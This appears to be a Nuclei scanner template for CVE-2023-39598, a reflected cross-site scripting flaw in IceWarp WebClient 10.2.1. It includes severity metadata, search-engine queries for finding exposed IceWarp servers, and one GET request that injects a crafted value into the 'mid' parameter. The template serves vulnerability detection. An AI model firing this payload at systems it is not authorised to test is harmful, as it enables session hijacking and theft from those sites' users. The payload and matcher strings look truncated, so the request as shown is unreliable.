id: CVE-2023-39598 info: name: IceWarp Email Client - Cross Site Scripting author: Imjust0 severity: medium description: | Cross Site Scripting vulnerability in IceWarp Corporation WebClient v.10.2.1 allows a remote attacker to execute arbitrary code via a crafted payload to the mid parameter. remediation: | Apply the latest security patches and updates from the vendor to address this vulnerability. impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. reference: - https://medium.com/@muthumohanprasath.r/reflected-cross-site-scripting-on-icewarp-webclient-product-cve-2023-39598-9598b92da49c - https://nvd.nist.gov/vuln/detail/CVE-2023-39598 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39598 - https://medium.com/%40muthumohanprasath.r/reflected-cross-site-scripting-on-icewarp-webclient-product-cve-2023-39598-9598b92da49c classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2023-39598 cwe-id: CWE-79 epss-score: 0.56383 epss-percentile: 0.98153 cpe: cpe:2.3:a:icewarp:webclient:10.2.1:*:*:*:*:*:*:* metadata: verified: "true" max-request: 1 vendor: icewarp product: webclient shodan-query: - title:"icewarp" - http.title:"icewarp" fofa-query: title="icewarp" google-query: intitle:"icewarp" tags: cve2023,cve,xss,icewarp,vuln http: - method: GET path: - '{{BaseURL}}/webmail/?mid={{to_lower(rand_base(4))}}">

' matchers-condition: and matchers: - type: word words: - "

" - "icewarp" condition: and - type: word part: header words: - "text/html" - type: status status: - 200 # digest: 4b0a004830460221009341ebaf07e730b802eb4f4dc95b823c963b980ae248350e1e86ce914d8f9221022100aed91b4d5e41aa5bd205a01ec3dcb2b6f6b83bac0e26f47e9150f3b3327c2990:922c64590222798bb761d5b6d8e72950